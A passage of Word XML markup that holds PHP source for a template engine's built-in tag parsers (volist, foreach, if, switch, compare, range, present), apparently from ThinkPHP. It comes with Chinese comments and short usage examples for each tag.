      </w:r>
    </w:p>
    <w:p w14:paraId="7B394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{/volist}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6027B9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6EF82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405FE8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3A5A4A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string|void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EDE5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806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tagVolist($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7C7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A971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336F1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$tag['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FFB8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$empty  = isset($tag['empty']) ? $tag['empty'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B1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!empty($tag['key']) ? $tag['key'] : 'i';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA8E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$mod    = isset($tag['mod']) ? $tag['mod'] : '2';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EC0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$offset = !empty($tag['offset']) &amp;&amp; is_numeric($tag['offset']) ? intval($tag['offset']) : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DCD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$length = !empty($tag['length']) &amp;&amp; is_numeric($tag['length']) ? intval($tag['length']) : 'null';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7114C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D74B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substr($name, 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126EA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$flag) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A46C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47656C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'$_result=' . $name . ';';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E4F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'$_result';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551731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5D5BB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238CDB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BC2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'if(is_array(' . $name . ') || ' . $name . ' instanceof \think\Collection): $' . $key . ' = 0;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F306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(0 != $offset || 'null' != $length) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F82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'$__LIST__ = is_array(' . $name . ') ? array_slice(' . $name . ',' . $offset . ',' . $length . ', true) : ' . $name . '-&gt;slice(' . $offset . ',' . $length . ', true); ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F14E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F9C9F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 $__LIST__ = ' . $name . ';';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4698C6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091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'if( count($__LIST__)==0 ) : echo "' . $empty . '" ;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD2DE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'else: ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC0B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'foreach($__LIST__ as $key=&gt;$' . $id . '): ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7651E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$parseStr .= '$mod = ($' . $key . ' % ' . $mod . ' );';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB3CE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 . $key . ';?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130BE6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$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A951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endforeach; endif; else: echo "' . $empty . '" ;endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB8C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(!empty($parseStr)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEBDD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36AD08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3EA7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29ABD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6892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D6BA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foreach</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>循环输出数据集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8D2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p>
    <w:p w14:paraId="163D10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{foreach name="userList" id="user" key="key" index="i" mod="2" offset="3" length="5" empty=""}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F05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{user.username}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529703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{/foreach}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F9D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0301AA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71F02B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25B78B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string|void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D10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5704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tagForeach($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13511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20C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(!empty($tag['expression'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A7D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$expression = ltrim(rtrim($tag['expression'], ')'), '(');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F74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$expression = $this-&gt;autoBuildVar($expression);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A360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foreach(' . $expression . '): ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B171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$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3655DF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endforeach; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C74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36B70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4B30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2D7D5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!empty($tag['key']) ? $tag['key'] : 'key';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB435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$item   = !empty($tag['id']) ? $tag['id'] : $tag['item'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C80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$empty  = isset($tag['empty']) ? $tag['empty'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B596C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$offset = !empty($tag['offset']) &amp;&amp; is_numeric($tag['offset']) ? intval($tag['offset']) : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00964D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$length = !empty($tag['length']) &amp;&amp; is_numeric($tag['length']) ? intval($tag['length']) : 'null';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2133E8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7A8C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substr($name, 0, 1)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B61A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  = '$_' . uniqid();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D01FD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00680D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$var . '=' . $name . '; ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDFE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$var;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7F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EEA22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77405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9D8A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'if(is_array(' . $name . ') || ' . $name . ' instanceof \think\Collection): ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7FC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(0 != $offset || 'null' != $length) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6107B2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(!isset($var)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4C63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 = '$_' . uniqid();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30802A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ED85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$parseStr .= $var . ' = is_array(' . $name . ') ? array_slice(' . $name . ',' . $offset . ',' . $length . ', true) : ' . $name . '-&gt;slice(' . $offset . ',' . $length . ', true); ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619A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0B83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 = &amp;$name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66794F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FDE9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'if( count(' . $var . ')==0 ) : echo "' . $empty . '" ;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660268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'else: ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0571E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(isset($tag['index'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE90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$index = $tag['index'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACE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 . $index . '=0; ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA98C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885E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'foreach(' . $var . ' as $' . $key . '=&gt;$' . $item . '): ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569DA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(isset($tag['index'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A2F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$index = $tag['index'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599B8A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(isset($tag['mod'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0ADF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$mod = (int) $tag['mod'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1AB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'$mod = ($' . $index . ' % ' . $mod . '); ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF828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2A0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 . $index . '; ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2531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D66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'?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E224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$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A13D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endforeach; endif; else: echo "' . $empty . '" ;endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D039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(!empty($parseStr)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2940B6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3299B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D54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95C4F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6478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77C9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if</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C8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p>
    <w:p w14:paraId="141211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{if condition=" $a eq 1"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437DB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{elseif condition="$a eq 2" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDAC4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CAE9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{/if}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215073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表达式支持</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> eq neq gt egt lt elt == &gt; &gt;= &lt; &lt;= or and || &amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A9C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63001F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16D853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03F601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0FAEAE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624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tagIf($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45017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754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$condition = !empty($tag['expression']) ? $tag['expression'] : $tag['condition'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EABCE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$condition = $this-&gt;parseCondition($condition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00139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 . $condition . '): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC2D1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4BE6B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D64D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67CA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elseif</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D017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格式：见</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0FED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@access public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D074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7C8BE5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1DFF7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6D9C15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F0BF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tagElseif($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E374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FBE0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$condition = !empty($tag['expression']) ? $tag['expression'] : $tag['condition'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE44C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$condition = $this-&gt;parseCondition($condition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03552C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elseif(' . $condition . '): ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758972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34FB8E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A0F1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582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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0020A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格式：见</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AA5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228C12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72B577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36BE5F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6C32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tagElse($tag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D93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3DE1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else: ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F74B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7E19A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304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1F39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switch</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FC90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p>
    <w:p w14:paraId="08360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{switch name="a.name"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCFD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{case value="1" break="false"}1{/case}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4233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{case value="2" }2{/case}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CA75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{default /}other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C00E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{/switch}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7965C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50277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1508CA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0D6034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3ED10E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2D40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tagSwitch($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E50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0ACA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!empty($tag['expression']) ? $tag['expression'] : $tag['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B18CA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510A8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switch(' . $name . '): ?&gt;' . $content . '&lt;?php endswitch; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFB01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2A80CF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9599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28A5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case</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要配合</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>switch</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>才有效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69B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23B71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4313E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6C90A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04090A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D2C8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tagCase($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566EFA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7BB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!empty($tag['expression']) ? $tag['expression'] : $tag['value'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F9E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substr($value, 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA89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$flag || ':' == $flag) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90F3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$this-&gt;autoBuildVar($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD45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'case ' . $value . ':';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DCF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elseif (strpos($value, '|')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303DEE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$values = explode('|', $value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F0EC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB810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($values as $val) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5353E9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'case "' . addslashes($val) . '":';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553A37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7F36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C529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'case "' . $value . '":';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37651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A735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 . $value . ' ?&gt;' . $content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CBE2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$isBreak  = isset($tag['break']) ? $tag['break'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AB9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$isBreak || $isBreak) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BC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break; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A607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6BBF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179A7A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4F0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F437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default</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要配合</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>switch</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>才有效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0AE1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使用：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> {default /}ddfdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E778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3A1350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12081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5AE174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163328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B813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tagDefault($tag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA57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974E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default: ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCCD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692AE9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5329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5BA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compare</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F51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用于值的比较</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> eq neq gt lt egt elt heq nheq </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>默认是</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD51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{compare name="" type="eq" value="" }content{/compare}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C372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7A2D8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40DE02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2020A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1F925B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DFD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tagCompare($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A79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29FF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10468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$tag['value'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6654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isset($tag['type']) ? $tag['type'] : 'eq'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA96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4BF62A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$flag  = substr($value, 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD882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$flag || ':' == $flag) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360918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$this-&gt;autoBuildVar($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16101F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38A46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 . $value . '\'';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB19F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46BB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($type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A49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'equal':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAAC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'eq';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA01F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2DB5C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'notequal':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746FBF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'neq';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1626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2BF8A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3079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$this-&gt;parseCondition(' ' . $type . ' ');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C38D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 . $name . ' ' . $type . ' ' . $value . '): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102053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43328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E47E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C6D1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range</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026AE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如果某个变量存在于某个范围</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则输出内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> type= in </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表示在范围内</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>否则表示在范围外</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B656A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{range name="var|function"  value="val" type='in|notin' }content{/range}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB5BD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example: {range name="a"  value="1,2,3" type='in' }content{/range}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432289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1EF045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02A1B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10E37C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021DF5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5495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tagRange($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B23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67F5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3F483D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$tag['value'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517E2A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isset($tag['type']) ? $tag['type'] : 'in'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A0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16C2CD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substr($value, 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4CDD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$flag || ':' == $flag) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D374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$this-&gt;autoBuildVar($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282EC0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   = 'is_array(' . $value . ')?' . $value . ':explode(\',\',' . $value . ')';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2494F6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1C4BF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 . $value . '"';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F141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   = 'explode(\',\',' . $value . ')';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097AB5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9109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('between' == $type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E32AA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$_RANGE_VAR_=' . $str . ';if(' . $name . '&gt;= $_RANGE_VAR_[0] &amp;&amp; ' . $name . '&lt;= $_RANGE_VAR_[1]):?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D09C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elseif ('notbetween' == $type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26165C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$_RANGE_VAR_=' . $str . ';if(' . $name . '&lt;$_RANGE_VAR_[0] || ' . $name . '&gt;$_RANGE_VAR_[1]):?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D55C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E4D3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$fun      = ('in' == $type) ? 'in_array' : '!in_array';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AAD6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 . $fun . '((' . $name . '), ' . $str . ')): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0503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75468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3C48B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87C8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300A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present</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67225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如果某个变量已经设置</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则输出内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC5F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{present name="" }content{/present}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECF43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40667E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3711D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43BFFF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37BD1F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76A3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tagPresent($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7872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D45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2AE2E2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5D0719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if(isset(' . $name . ')): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C3C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119118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57B5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D258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notpresent</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
